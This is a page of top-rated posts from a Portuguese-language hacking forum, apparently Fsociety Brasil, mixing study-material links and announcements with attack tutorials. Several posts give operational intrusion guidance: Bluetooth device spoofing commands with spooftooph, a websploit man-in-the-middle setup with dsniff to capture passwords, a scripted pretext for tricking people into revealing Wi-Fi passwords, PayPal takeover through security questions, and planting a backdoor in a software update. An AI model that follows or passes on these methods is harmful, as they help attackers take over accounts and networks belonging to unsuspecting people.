Jump to content

Leaderboard


Popular Content

Showing content with the highest reputation since 10/24/16 in all areas

  1. 25 points
    Ladies and Gentlemen, com prazer que anúncio a vossas senhorias um marco na História da Fsociety Brasil. Nosso primeiro projeto totalmente voltado para desenvolvimento de sistemas, cuja autoria é totalmente nossa. Um dos fundadores da Fsociety Brasil, @Victor Lima está criando uma série de vídeo aulas onde ensinará vocês a desenvolver um aplicativo móvel, uma plataforma web e um Host para rodar no dekstop ou servidores a fim de permitir que o usuário consiga controlar a sua máquina através de comandos na interface web ou inerface gráfica do smartphone, tudo isso sem digitar qualquer linha de comando, apenas com cliques simples, veja o vídeo de introdução ao treinamento. Projeto Watch Dogs - Fsociety Brasil
  2. 21 points
    E ae galera, trago pra vocês uns materiais para estudo. Nada de apostila, tudo pela internet. Eu peguei o básico do básico e reuni. Não precisa estudar todo dia, toda hora, estudem quando tiver vontade. É serio, uma hora você vai falar "agora eu vou estudar", espere esse momento chegar. Eu segui dessa seguinte maneira: GNU/Linux > Redes > Programação > Hacking. Vamos lá. No nosso repositório você encontra de tudo, todo tipo de material. Link do nosso repositório http://pc.cd/VfbotalK Senha: issonaoehumasenha5/9 INTRODUÇÃO AO GNU/Linux INTRODUÇÃO -> https://goo.gl/Sjih4K CURSO GNU/Linux -> https://goo.gl/SlZgwD DOMINANDO O TERMINAL -> https://goo.gl/Ka6Uu1 A ARVORE DE DIRETÓRIO DO LINUX -> https://goo.gl/g5SmeI INTRODUÇÃO AO BÁSICO DO BÁSICO DE REDES: TCP/IP -> https://goo.gl/XPNEH9 UDP -> https://goo.gl/1M5SYF DIFERENÇA DE TCP E UDP -> https://goo.gl/j0MtY0 HUB, SWITCH, ROTEADOR E MODEM -> https://goo.gl/SAQbkI BRIDGE -> https://goo.gl/Wu4hcj NAT -> https://goo.gl/c8NjHH DNS -> https://goo.gl/bsMdUR GATEWAY -> https://goo.gl/OFOkkZ DHCP -> https://goo.gl/5gnZrc LISTA DE PROTOCOLOS DE REDES -> https://goo.gl/EJ1YvZ CURSO DE REDES -> https://goo.gl/XijVVc INTRODUÇÃO A PROGRAMAÇÃO LOGICA DE PROGRAMAÇÃO -> https://goo.gl/9GNGHs PYTHON -> https://goo.gl/xkzYkk C -> https://goo.gl/KYgUKn C# -> https://goo.gl/C4zvN0 C++ -> https://goo.gl/HuhBSs PHP -> https://goo.gl/LymDBl RUBY -> https://goo.gl/kgcA1g JAVA -> https://goo.gl/q0sGmN HACKING SOU INICIANTE, QUERO SER HACKER, POR ONDE COMEÇO -> https://goo.gl/TiM39Y OS PRIMEIROS PASSOS DE UM HACKER INICIANTE -> https://goo.gl/BLIM5k COMO SER UM HACKER DE SUCESSO -> https://goo.gl/QrgQjW COMO FUNCIONAM OS CYBER ATAQUES PARTE 1 -> https://goo.gl/55SDY4 COMO FUNCIONAM OS CYBER ATAQUES PARTE 2 -> https://goo.gl/QYaRHc KOSHIMARU KISARA - INTRODUÇÃO AO CURSO HACKER -> https://goo.gl/2rl55d CAVEIRATECH - INTRODUÇÃO AO HACKING E PENTEST -> https://goo.gl/KsTfvw ANONIMATO -> Anonsurf: https://goo.gl/vEyWOu && Whonix: https://goo.gl/VSajTM CANAIS COM CONTEUDO DE TECNOLOGIA/HACKER -> https://goo.gl/TB4px8
  3. 16 points
    Mr. Robot, episódio 6. Como de costume, não decepcionante. Mais uma vez, nosso herói, Elliot, usou seu extraordinário intelecto e habilidades de hacking para nos inspirar. Neste episódio, Elliot está sendo chantageado pelo traficante de drogas implacável, Vera, para tira-lo da prisão. Shayla esta sendo refém e Elliot tem até a meia-noite para invadir o sistema de computador da cadeia para liberá-lo. Elliot tenta explicar a Vera que tal invasão não pode ser feita em questão de horas, mas sim dias ou semanas para encontrar uma vulnerabilidade de segurança que ele possa explorar. Pendrive malicioso Em sua primeira tentativa de invadir a prisão, Elliot e Darlene, sua parceira da Fsociety, "acidentalmente" deixam cair pendrives infectados perto da prisão. A estratégia aqui é que se alguém dentro da rede da prisão pegar um e inseri-lo no seu sistema de computador, irá ter injetado um malware e assim dando uma entrada para Elliot. Como esperado, um oficial pegou um e inseriu em seu computador. Elliot foi capaz de ter uma conexão remota, mas antes de poder fazer qualquer coisa, o software AV (antivírus) detecta a intrusão e desconecta Elliot. Elliot então questiona Darlene por ela ter pego um malware já conhecido (pelos antivírus, no caso), ao invés de desenvolver um próprio malware e então Darlene se defende dizendo que só tinha meia-hora. A rede Enquanto Elliot está visitando Vera na prisão, ele traz seu telefone com ele, no qual ele instalou um aplicativo de scanner Wi-Fi. Com esse scanner, ele pode ver todos os APs sem fio e vê que todos estão usando WPA2. Embora ele saiba que pode quebrar WPA2, porem o tempo é curto para que ele possa fazer um bruteforce na rede. No processo de descoberta de hotspots sem fio e tecnologias de criptografia com seu telefone, Elliot vê uma conexão Bluetooth quando o carro de um agente passa perto dele. Isso estimula Elliot a uma nova estratégia, invadir o Bluetooth e entrar no sistema de computador da prisão através da conexão dedicada do carro da policia à prisão. A estratégia de Elliot aqui é falsificar a conexão Bluetooth do carro da polícia com o teclado. Se ele pode fazer o laptop acreditar que seu teclado é realmente o teclado do policial, ele pode controlar o laptop do policial e entrar na rede da prisão. Uma vez dentro da rede, ele pode enviar malware para assumir o controle dos sistemas controlados digitalmente da prisão. Ativando o Bluetooth Antes que Elliot possa fazer qualquer coisa, ele precisa habilitar o Bluetooth em seu sistema: service bluetooth start Em seguida, ele precisa ativar o dispositivo Bluetooth: hciconfig hci0 up Então ele verifica se ele realmente está funcionando, digitando: hciconfig hci0 Observe o "Endereço BD" na segunda linha - este é o endereço MAC do dispositivo Bluetooth. Procurando dispositivos Bluetooth A primeira coisa que Elliot no processo de invasão é procurar conexões Bluetooth. Se você olhar de perto a tela de Elliot, você pode ver que ele está usando o hcitool, uma ferramenta de configuração Bluetooth integrada no Kali Linux. Embora isso funcione, tive um melhor desempenho com o btscanner, um scanner Bluetooth. Para usá-lo, digite: btscanner Em seguida, selecione "i" para iniciar uma verificação de inquérito. Você pode ver os resultados abaixo. Usando o btscanner, podemos obter uma lista de todos os dispositivos Bluetooth por perto. Este aqui tem um endereço MAC e um nome de "Tyler" - para falsificar este dispositivo, devemos falsificar o endereço MAC e o nome do dispositivo. É assim que Elliot recebe o endereço MAC e o nome do dispositivo Bluetooth do carro do policial. Lembre-se de que o Bluetooth é um protocolo de baixa potência com um alcance de apenas cerca de 10 metros (embora com uma antena direcional, distâncias até 100 metros foram alcançadas). Spoof o endereço MAC do teclado Agora que Elliot tem o nome e o endereço MAC do teclado do policial, ele precisará clonar o teclado do policial com essas informações. O Kali Linux possui uma ferramenta projetada para spoof de dispositivos Bluetooth chamados de spooftooph. Podemos usá-lo para falsificar o teclado com um comando semelhante a este: spooftooph -i hci0 -a A0:02:DC:11:4F:85 -n Car537 -i Determina o dispositivo, neste caso hci0 -a Determina o endereço MAC que queremos falsificar -n Determina o nome do dispositivo que queremos falsificar, neste caso "Car537" Se o fizermos corretamente, nosso dispositivo Bluetooth irá falsificar o endereço MAC e o nome do dispositivo Bluetooth do computador do policial. Para verificar se foi bem sucedido, podemos usar o hciconfig seguido do dispositivo e o "nome" do switch que irá listar o nome do dispositivo. Lembre-se, este é o nosso dispositivo Bluetooth que estamos tentando emular com o dispositivo Bluetooth do carro de polícia. Se tivermos sucesso, ele terá o mesmo endereço MAC e o nome do dispositivo Bluetooth do policial. hciconfig hci0 name Agora, temos um dispositivo Bluetooth que é um clone perfeito do teclado Bluetooth do carro da polícia! O link do serviço bluetooth para o laptop do policial Agora é aqui onde o roteiro e realidade de Mr. Robot se divergem. O hacking de Mr. Robot é realista, porém as vezes, o diretor precisa deixar as coisas um pouco mais fictícias. E isso é permitido pois as obras não devem se limitar pela realidade. Para que o Eliot se conecte agora ao laptop do carro de polícia, ele precisaria da chave de link (esta é uma chave para identificar o dispositivo Bluetooth previamente emparelhado) que foi trocada entre o teclado e o adaptador Bluetooth no laptop. Ele poderia adivinhar (improvável) ou crack-lo, mas não será tão rápido como apareceu no show. Outra possibilidade é que, quando o sistema foi reiniciado ou o teclado foi desconectado, Elliot pode se conectar ao laptop, pois é um clone do teclado do policial. Em ambos os casos, levaria mais tempo do que Elliot tinha neste episódio para cortar o teclado Bluetooth do policial. Hackeando a prisão Na etapa final, Elliot usa o computador hackeado do policial para fazer upload de um malware via FTP, que lhe dará o controle das portas das celas da prisão. Poucas pessoas sabem que prisões e outros sistemas industriais, muitas vezes usam SCADA (Sistemas de Supervisão e Aquisição de Dados). Estes sistemas industriais possuem PLCs. Presumivelmente, essa prisão tinha PLCs controlando as portas das celas da prisão (uma suposição muito razoável) e o malware de Elliot infectou-os e lhe deu controle, permitindo-lhe abrir todas as celas, liberando Vera e todos os outros prisioneiros.
  4. 14 points
    Ladies and Gentlemen, é com enorme prazer que lhes anuncio um acontecimento histórico. O Lançamento da Primeira Maratona Hacker da Fsociety Brasil. Após fecharmos parceria com a Desec Security, ela nos disponibilizou um voucher para que pudéssemos disponibilizar entre os membros da Fsociety Brasil, sendo assim, eu me reuni comigo mesmo e foi decidido por unanimidade que deveria ser criada uma Hackathon, cujo prêmio será a formação Pentester Profissional desta que é uma das maiores empresas de Segurança da Informação do Brasil. Além da Desec Security a Sinergia Consultoria e Soluções também está apoiando o evento e disponibilizou um ingresso para um dos Roadsecs Regionais ou então para a versão final do Roadsec São Paulo 2018, consulte a premiação no link abaixo. Confira a descrição, regras e FAQ no repositório oficial do Projeto: https://github.com/fsocietybrasil/hackathon-fsociety-2018 Interessados em participar devem antes de tudo ler as regras e indicações, em seguida escolher um dos temas listados e após concluir seu projeto, deve enviar um e-mail para [email protected] com o assunto "Hackathon Fsociety Brasil", neste e-mail devem estar descritos: Informações sobre o projeto Repositório com o código fonte para que possamos avaliá-lo Instruções de uso, instalação e configuração do mesmo. Obrigado aos apoiadores e boa sorte aos competidores!
  5. 13 points
    Olá amiguinhos, tudo bem? Vou contar como usei e aperfeicoei minhas técnicas de engenharia social para conseguir benefícios no meu cotidiano ao longo dos anos. Isso inclui coonseguir desde a senha do Wifi, até sexo com as amiguinhas <3 Antes de tudo uma pausa para um comercial dos nossos patrocinadores Bom, primeiro eu devo-lhe advertir que isso não é feito de má intenção ou que vise prejudicar alguém, é apenas utilizar da psicologia humana para tornar as pessoas mais flexíveis. (todos sabemos que humanos são egoístas). 1 - Da que eu te dou outra. Vou usar como exemplo um caso recente. Em março deste ano (2017) eu conversei com o @Apoc a respeito da necessidade de Fabricar camisetas para angariar fundos para o projeto e obviamente, renovar o contrato dos servidores que acaba em setembro. Daí, então eu fui a uma loja para fazer um orçamento e conversa vai, conversa vem... Precisei mostrar a estampa para a recepcionista da confcção (estava no google Drive), sem um pacote de dados eu precisava de wifi (olhei pro roteador dela na hora) e na maior naturalidade eu pedi a senha para que pusesse acessar a rede e mostrar a estampa e a moça simplesmente me falou a senha, mesmo sem compromisso algum comigo. Ou seja, eu ganhei acesso a uma rede privada apenas PEDINDO, obviamente não foi apenas um pedido, mas um pedido contextualizado. Blz, mas e daí? -E daí que é disso que você precisa! Uma situação pra justificar o seu pedido. Eu vou explicar de uma forma que você possa compreender. Segundo a psicologia humana, As pessoas tendem a ser avessas as outras caso notem algum interesse da sua contra-parte. Ex: Quando você pede algo para alguém desconhecido a primeira reação da pessoa é negar. Afinal, ela nem te conhece, porém, se você oferecer algo antes, sem pedir nada em troca, a pessoa adotará uma posição flexivel aos seus próximos pedidos, resumindo. ANTES DE PEDIR UM FAVOR, FAÇA UM SEM COBRAR NADA! Aquela pessoa que você beneficiou (ou que de alguma forma se propôs a beneficiar, como a recepcionista da confeção seria beneficiada com um cliente novo) se sentirá em divida com você e não saberá negar um pedido simples ou que não cause danos. Essa técnica da senha do Wi-Fi pode ser usada em qualquer lugar, você só precisa criar uma situação favorável para si e desfavorável para o alvo. Algo similar ao ataque de Kevin Mitnick à Motorola. A parte de conseguir sexo com as amiguinhas eu conto outro dia, pq é preciso ensinar mais alguns truques de comportamento, autocontrole emocional e também uma lista imensa do que não fazer.
  6. 11 points
    Sim, você leu certo. Imagine invadir contas bancarias através de informações postadas no Facebook. Não é novidade que usuários de redes sócias expõe seus dados para o publico. ANTES DE COMEÇAR O TUTORIAL QUERO QUE SAIBAM QUE TUDO QUE FOI CRIADO AQUI É FALSO (CONTAS E DADOS BANCÁRIOS). Vamos a pratica. Eu descobri esse método logo após uma atualização do Facebook, nela, você pode procurar quaisquer publicações. No meu exemplo de busca, buscarei por email + um site de banco. Podemos observar que, com uma simples busca + filtrar resultados, o próprio Facebook nos retornou o que queríamos. Nessa jogada de dork, já temos um perfil verdadeiro + email + detalhes de custo + sabemos que temos uma conta no paypal + detalhes extras. Com essas informações, o engenheiro social já pode atacar. Você ainda pode explorar o perfil, descobrindo o nome da mãe, cachorro, cidade natal, cidade de nascimento, data de aniversario e entre outras coisas. Partimos agora para os privilégios, exploração da conta do email. Sabemos que contas de correios eletrônicos tem falhas se forem mal configuradas. Irei mostrar isso em outro tutorial. Porem, usamos as informações obtidas coletadas da vida da vitima. Podemos adquirir acesso ao email descobrindo as principais perguntas de segurança. Nome da mãe, cidade que nasceu, professora da X serie e assim por diante. Existem VÁRIAS maneiras de se conseguir acesso a uma conta de email. Sabendo o login do email de alguém, você pode fazer um estrago. Agora que tenho acesso a conta de email, sem precisar de nenhuma senha, vamos redefinir a senha da conta do Paypal e ganhar acesso total. Solicitando a recuperação de senha e a alteração a configuração da conta, conseguimos total acesso a conta Paypal. Galera, sei que foi um tutorial rápido e sem muita pratica, mas queria mostrar mesmo a vocês o perigo de você ou os seus familiares postarem informações sigilosas em redes sociais, ou até mesmo, deixando o perfil aberto para o publico. Espero que vocês tenham gostado, e eu vou tentar trazer os principais "bypass" em contas de correiro eletrônico . Em caso de duvida, irei responder.
  7. 9 points
    Eu não sei postar aqui, sorry mesmo A página ficou assim Resultado foram uns 20 facebook coloquei alguns ai nos print
  8. 9 points
    Dicionário Hacker. Créditos TheCyberTeam DicionarioHacker(TheCybersTeamv1.1).pdf
  9. 9 points
    Pessoal, fiz um backup de cursos da Alura que encontrei na internet. Segue o link: http://minhateca.com.br/Gabriel.Rocha/Cursos/Alura. Observação: os arquivos estão separados por áreas, e o nome de cada arquivo você encontra no arquivo .txt de cada pasta. Bons estudos!
  10. 9 points
    Kk eae pessoas trago pra vcs uma pasta minha do Google Drive ela ta meio bagunçada mas ta izi: https://drive.google.com/folderview?id=0BxB0EuGgfBxWOTJubURRUVRrSW8
  11. 9 points
    E ae galera, hoje eu estarei mostrando o perigo de uma só maquina rodando varios serviços. Em meu laboratório eu montei 3 maquinas: - Ubuntu (servidor) - Windows 7 (cliente) - Kali Linux (atacante) Ubuntu.: SSH + Sistema de Update de Software da Empresa. Windows Xp.: Cliente. O ataque - Planejamento 1/3 Antes de mais nada, conhecer a empresa alvo! Saber como ela funciona é importante, com que tipo de produto ela trabalha, quantos funcionários trabalham la dentro, cargos dos funcionários e por ai vai. Ferramentas usadas: - whois - maltego - facebook Whois Levantando as informações da empresa com o Whois, podemos descobrir muitas coisas: Maltego Com o Maltego eu consegui alguns emails de funcionários e varias coisas relacionadas a empresa: Facebook Com o Facebook, eu descobri quem trabalha la e qual setor: O ataque - Reconhecimento 2/3 Nessa hora o atacante vai descobrir o tipo de tecnologia da empresa, como ela funciona e etc. Ferramentas usadas: - nmap - builtwith Nmap Com o Nmap descobrimos as portas abertas e seus serviços: Builtwith Com o builtwith descobrimos o que esta rodando no sistema web: O ataque - Explorando 3/3 Agora a parte de juntar tudo e explorar. Sabendo agora como a empresa funciona e qual sua tecnologia, eu preciso achar uma maneira de entrar. Vendo que os serviços estão todos atualizados, o atacante as vezes tem que sair de seu local de ataque e se arriscar para invadir fisicamente. Analisando a empresa de perto, descubro um access point que um funcionário deixou. Esse access point esta ligado junto com a rede principal, com isso eu consigo entrar na rede. Sabendo que à um serviço SSH, ele descobre o IP interno que esta rodando. Entretanto, tudo esta atualizado, porem sem proteção. Eu notei algo, o servidor SSH esta e mandando pacotes para outro IP dentro da rede. Logo eu planejei um ataque: - Preciso derrubar a conexão SSH entre as duas maquinas. - Depois delas se desconectarem eu faço um ataque MITM. - Com isso eu consigo o login do SSH. Feito! Eu estava navegando no sistema até que descubro que aquela mesma maquina, também fornece updates para os softwares da empresa. Eu conseguir modificar o update e conseguir coloca uma backdoor, nisso os clientes acham que é uma atualização. Com isso, eu não apenas afeto a empresa, mas sim também, os clientes. Cliente: Eu:
  12. 9 points
    Salve rapaziada, quase nunca uso essa conta pra postar aqui, mas aí vai uma dica de ouro, recentemente andei precisando fazer umas modificações num software em Python (eu não sei nada de python, só sei programar em outras linguagens) e como não tinha ninguém pra fazer o job pra mim, fiz eu mesmo uma busca rápida por processamento concorrente no YouTube e achei uma playlist com quase 200 video aulas, assisti apenas a aula 130 que é o que eu precisava saber e funcionou direitinho, então pela qualidade do canal do cara, recomendo-o para vocês, que queiram estudar python desde o começo.
  13. 9 points
    Arquivos sobre pentest em .PDF (para leitura) Como Funciona pentest.pdf curso-de-pentest-Exploit-07.pdf curso-de-pentest-Password-Hacking-05.pdf curso-de-pentest-Wireless-Hacking-04.pdf curso-de-pentest-Engenharia-social-03.pdf pentest-metasploit.pdf Executando Pentest com Ferramentas de Código Aberto.pdf Pentest -técnicas de Invasão e defesa.pdf pentest-lol.pdf pentesting-joomla.pdf
  14. 9 points
    COÉ RAPAZIADAAAA! Como anunciado há algum tempo, temos uma plataforma de EAD, que estava em Desenvolvimento e Depois fase de testes. Agora é a hora da verdade. Estamos procurando voluntários para a criação de Conteúdo de Q U A L I D A D E para o EAD, lembrando que todos os cursos serão gratuitos para os alunos e os voluntários ganham experiência e obviamente Know How para exibir em seus portfólios e currículos. Se você sabe o suficiente sobre Design para a Web, UI Design, UX Design, Programação (em qualquer linguagem) e tem a capacidade de criar vídeos em série (sem edição, temos editores na staff que farão toda a mágica). Entre em contato conosco via email para [email protected], informando os seguintes dados: - Nome completo - Endereço de E-mail válido - Experiência Profissional ou academica - Qual o curso que você deseja produzir e quanto tempo disponível tem. Nós ajudaremos com um acompanhamento pedagógico e dicas de qualidade, para elevar o conteúdo produzido por você e obviamente para nossa comunidade. A escola de hackeamento está a caminho, senhores.
  15. 8 points
    Instalando e usando o NMAP no Android O nmap é uma das principais ferramentas no mundo do pentest, às vezes, você precisa realizar um teste e o nmap é uma ferramenta super completa, dá para scannear portas, vulnerabilidades e até explorar. E algumas dessas vezes você só tem acesso ao seu celular, como eu no momento, então aqui vai uma dica para você instalar e usar o nmap em seu aparelho Android. Enfim, antes de começar, precisaremos de um só requisito... *Termux - Emulador de terminal Debian para Android. Playstore: https://play.google.com/store/apps/details?id=com.termux --------------------------------------------------------------------------------------- Pronto. Com o Termux baixado e aberto no seu celular vamos digitar o seguinte comando: apt-get update -------------------------------------------------------------------------------------- Ok. Agora está tudo certo, para instalar o nmap basta digitar: apt install nmap //Segue o print do que aparecerá no anexo 1 ---------------------------------------------------------------------------------------- Agora vamos testar o nmap: nmap 192.168.1.1 //Segue o print no anexo 2 ---------------------------------------------------------------------------------------- Bem basicamente, está feito. É realmente muito simples, futuramente pretendo mostrar algumas incrementações nesse tutorial para quem não sabe, explorar e analisar vulnerabilidades, fazer bruteforce e outras coisas com NSE. Espero que tenham gostado, bons estudos
  16. 8 points
    ATAQUE DE MITM COM A FERRAMENTA WEBSPLOIT O ataque de Man-in-the-middle é um dos principais ataques no mundo do hacking. E hoje vou trazer um tutorial feito por mim mesmo, ensinando a realizar esse ataque com a ferramenta Websploit. Então vamos lá... REQUISITOS: Python-Scapy Git Primeiro abra o terminal e digite: apt-get install pip Depois: pip install scapy Depois: apt-get install git Depois: git clone https://github.com/websploit/websploit ############################################################## Com isso tudo feito, agora podemos seguir com o tutorial. Execute a ferramenta. ./websploit Agora digite: use network/mitm Depois, para mostrar as opções digite: show options [/align] Agora você fará as configurações. Vamos começar pela interface. Abra outro terminal, ou outra guia e digite: ifconfig A minha interface de rede é "enp1s0", a sua provavelmente é wlan0 ou eth0. Agora vamos voltar para o Websploit e digitar: set interface Agora vamos selecionar o ip do roteador, digite: set router 192.168.1.1 Agora vamos selecionar o IP do nosso alvo, no caso eu vou digitaro IP da minha máquina para demonstrar. Porém, precisamos descobrir o ip do alvo, ou seu próprio IP, para ver seu ip, digite novamente: ifconfig E para ver IPs de pessoas na sua rede, digite: nmap 192.168.1.1/24 No meu caso o IP da minha máquina é: "192.168.1.31" então, vamos digitar: set target E agora nós vamos selecionar nosso sniffer. Tem vários sniffers: O Driftnet | Pega imagens do alvo O DSNiff | Pega senhas O URLSnarf | Pega links O MSGSnarf | Pega as mensagens Eu tenho o Dsniff e o Driftnet, e para demonstrar vou usar o Dsniff. Então basta digitar: set sniffer E agora simplesmente para rodar tudo, digite um: run E agora ele vai pegar todas as senhas de um serviço rodando na web. EU acho que não pegará de serviço s HTTPS, (mesmo tendo função pra pegar) porque eu tentei no Facebook e não deu certo :v
  17. 8 points
    Engenharia social para conseguir wifi: Passo 1: Sondagem. Lembre-se engenharia social demanda conhecimento prévio da vitima, o que você precisar saber antes do ataque: - Onde fica o roteador? É no apartamento 1? Na loja do lado? No escritório do segundo andar? - Quantas pessoas vivem nesse local? Alguém lá entende de informática? - Que horas tem menos pessoas nesse local? Que horas a pessoa mais “frágil” (Manja nada de informática) está sozinha lá? (Em breve vou postar um tópico sobre escolher alvos, nem sempre o mais frágil é o que tem menos instrução, mulheres ou crianças, na maior parte dos meus ataques o mais frágil é o maridão, o paizão que pensa que sabe tudo, aquele que sempre concorda e acha que sempre soube daquilo). Passo 2: O ataque. Se prepare para os procedimentos, procura abordar em horários que vitima mais “frágil” está sozinha no local. Esse é o script padrão, estude a essência dele e adapte para sua situação. Dedo na campainha e lembre-se se você não se convencer, não vai conseguir convencer ninguém, Confiança e olhos firmes. (pratique no espelho ou procure no wikihow como exalar confiança ) Siga o script: Bom dia! Sou o Gabriel, da casa ao lado, meu telefone sem fio está com muito chiado e falhando, acho que ele está conflitando com seu roteador, sabe me informar qual frequência ele opera? 1 – Sim ele opera em 50 Ghz! E agora?? O que eu faço? Enfio o rabo entre as pernas e agradeço? – Não !- diga que já mudou essa frequência e não adiantou, pergunte sobre a banda da frequência. E siga usando banda da frequência no lugar de só frequência 2 – Não faço a menor ideia! Pois bem, conflitando com meu fone sem fio, minhas ligações caem e sua net fica mais lenta. Já tentei varias bandas inclusive troquei do meu roteador também ( Isso vai dar impressão de que você não precisa da net dela) ficou bem mais rápida, mas ai acho que conflitou com o seu, poderia ver lá para mim? Assim resolvo esse conflito, por favor, meu telefone está um caos! Observações: Se a vitima não manja “das computação”, ela vai perguntar o que tem a ver uma coisa com outra, você explica que net sem fio trabalha com frequência igual de radio, quanto tá na mesma frequência do telefone, o tel cai e a net fica lenta. Se a vitima manja, ela já sabe que interfere sim, se não souber vai pesquisar na net porque ele é um fução, então vai descobrir isso e pedir pra vc alterar. Nesse caso pode ser necessário entrar no ip do roteador, a senha wi-fi fica logo abaixo de onde fica a frequência, fique de olho. Ela vai dizer que não sabe ver a frequência e provavelmente vai pedir para você conferir pra ela, se não pedir peça para deixar você dar uma olhada, impossível ela negar, chegando no pc temos duas situações: 1° A vitima sai de perto. Ficou fácil clica com o direito no ícone wi fi, seleciona a rede dela, propriedades exibir caracteres. Pronto você já tem a senha. 2° A vitima fica do seu lado olhando pra a tela e vendo o que vc faz. Vamos ter que disfarçar, cmd no executar, vai abrir o prompt, digite ipconfig/all para exibir propriedades de rede, vai aparecer tanta letrinha que a vitima vai ficar confusa, diga “ Nossa o conflito é aqui mesmo, vou ver nas propriedades de rede” e na cara dura proceda como no passo anterior. Pode tentar entrar direto no admin do roteador e olhar por lá isso vai dar um tom mais profissional e dar mais confiança para vitima, assim você assegura futuros ataques. Pelo que você percebeu da vitima vai saber se ela vai tentar mudar a senha futuramente, se você fez com bastante confiança ela não vai e se precisar mudar vai chamar você para fazê-lo. ( você também pode olhar a senha do roteador dela caso ela mude ) Use a senha em horários que tenha pouca gente na casa de inicio, isso é para que a vitima não desconfie da lentidão da net. Depois de um tempo ou um mês, use a vontade. Informações pra você ficar mais confiante: Nunca errei esse ataque, nem quando era noob, sempre atingi o objetivo sem levantar suspeitas. Já apliquei em hospitais, hotéis, lojas, escritórios, o pior que aconteceu foi pedirem para eu voltar depois e conversar com o técnico, quanto falei com ele perguntei da banda ele disse “onde vejo isso?” eu disse me leva até o roteador que eu te mostro. Hoje consigo fazer isso por telefone, faço a vitima me ditar a senha, mas isso requer pratica, se você já tem, vai ser fácil, se não tem basta praticar ou pedir uma ajuda nos comentários que vou te ajudar. Esse exercício é básico, não requer tanta habilidade, pode testar em localidades desconhecidas até conseguir fazer com perfeição. Sim o post fica longo mesmo, tentei fazer resumido, mas quis colocar algumas hipóteses que possam atrapalhar então me desculpem. Se se deparou com algo incomum no seu ataque, por favor, poste ou me mande mensagem é muito importante para meus estudos. E este é para conseguir a senha de alguma empresa por telefone: Liguei de um orelhão e me identifiquei como funcionário da GVT do setor de qualidade, e perguntei como estava a velocidade da conexão nos últimos dias, e é claro que reclamaram, principalmente que esta empresa não possui um técnico de TI in loco. Para conseguir segui as etapas: Pedi que desliga-se o modem por 1 minuto; Pedi a identificação do aparelho; Pedi o código impresso em cima do aparelho, para que eu pudesse aumentar a velocidade para o dobro para amenizar os problemas enfrentados; O código recebido era a senha da rede …. Passei um numero de protocolo falso; Eu não manjo muito de hacking no pc, é bem mais facil pra mim, que não possuo conhecimento em progamação, usar engenharia social e abusar da confiança alheia pra conseguir as coisas já consegui muitos face/insta de pessoas "famosas" só com o celular, o famoso keylogger, que apesar de simples é uma arma muito boa quando você é um bom manipulador
  18. 8 points
    Ladies and Gentlemen, é com enorme prazer que lhes apresento a nossa nova campanha de criação de conteúdo. Vamos sortear 1 camiseta ao final de cada mês para os membros que mais criaram conteúdo em nosso Fórum, a fim de incentivar a comunidade a criar mais conteúdo e divulgar os eventos da cultura hacker pelo nosso país. Abaixo segue o primeiro modelo que sortearemos, é uma camiseta da comunidade Inurl Brasil, como no modelo abaixo.
  19. 8 points
    Olá Jovens, hoje irei compartilhar com vocês algo que aprendi em relação a Aprender! Todos que estão aqui estão à procura de algum tipo de conhecimento no mundo da Tecnologia, alguma linguagem de programação ou qualquer outra coisa. Muitos de nós e até eu há alguns tempos atrás "aprendia" de forma errada e hoje vou ajuda-los a aprender o conteúdo estudado. Teoria dos 70:20:10 ! A teoria dos 70:20:10 nasceu de um estudo que indica que: 10% do seu aprendizado em qualquer conteúdo são aulas teóricas, ou seja, algum livro que você baixa e lê, uma aula que você assiste ou um simples artigo. Muitas pessoas acham que estão aprendendo apenas por lerem um artigo ou alguma página de livro, você pode até por pouco tempo decorar, porém, irá esquecer logo mais. 20% são da interação e o compartilhamento de informações com demais pessoas que querem aprender determinado conteúdo, ou seja, temos o fórum, Aprendeu algo? Compartilhe! Ensine, você está beneficiando a você mesmo e aos demais. Mas não seja aquele chatão que fica o tempo todo enchendo o saco dos outros: "como faz isso, faz isso pra mim" Procure por conhecimento também, a opção de busca do fórum também ajuda muito, pois uma dúvida pode já ter sido respondida ou pode conter no Google! Use ele também ^^ 70% Vem da prática! Ohhh pratica! Assim que aprendeu algo, sempre pratique, treine contigo mesmo! Nas áreas de ferramentas aqui do fórum tem um tópico para testar habilidades hacker caso você estude isso, até mesmo você pode praticar jogando, sim, existem jogos para que você pratique o conteúdo aprendido. Lembre-se: Pratique muito até chegar a aprender! Algumas outras dicas: Defina objetivos: Sempre defina um objetivo, pois se não for definido um objetivo, você terá estudado algo em vão, ou seja, algo que não irá utilizar. Eu por exemplo, estou aprendendo linguagens C para poder aprender a programar um servidor de jogos baseado em Samp ( san andreas multiplayer ).1 Estude antes: Como assim estudar antes? É mais ou menos assim. Na hora de aprender irá surgir muitas dúvidas, é bom que antes de estudar, você tenha em mente o que irá estudar. Ou seja, apenas um resumo para depois se aprofundar no que for aprender. Leia ou Assista a Aulas: É muito importante que você adquira o conhecimento que quer aprender, seja lendo, assistindo aulas ou qualquer outra forma que você aprender a fazer algo. Para saber o que fazer na prática é preciso saber o que irá fazer na teoria, acredite! as duas coisas andam juntas. Pratique depois: É preciso que, depois de ter adquirido o conhecimento de forma teórica, ou seja, aprendido algo lendo ou assistindo alguma aula ou qualquer coisa parecido por em prática. Ou seja, aprendeu a fazer algo? Faça várias e várias vezes a mesma coisa até que possa aprender. Mas NÃO deixe de fazer ou praticar de vez em quando para que você não esqueça. Crie um exemplo: Vamos fazer um exemplo agora, digamos que você aprendeu uma forma de defesa contra um ataque hacker e você está sendo atacado e precisa por em prática o conteúdo em que aprendeu para poder se defender. Crie exemplos de situações em que seriam usados o conhecimento que você aprendeu para que você possa praticar dessa forma. Descanse: É muito importante que, depois de ter estudado e colocado em prática, descanse! Pois o seu cérebro irá relaxar e sugar o conhecimento aprendido e praticado. Repita: É como eu disse acima, nunca deixe de praticar e repetir o que aprendeu, repita várias e várias vezes. Dica de ouro: ENSINE! É uma dica que vale muito, quanto mais a gente tenta ensinar algo para outra pessoa e compartilha um conhecimento, mais a gente aprende! Aprendeu algo? Compartilhe com alguém, mesmo se for algo conhecido ou até mesmo "simples" poderá ajudar muitas pessoas assim como poderá ajudar a si mesmo! Espalhe conteúdo, temos nosso fórum para isso, ajuda muito a todos. Essas dicas irão ajudar muito, mais muito mesmo vocês, assim como me ajudou! Gostou de conteúdo? Achou útil? Te ajudou? Peço humildemente que me agradeça apenas fazendo isso:
  20. 8 points
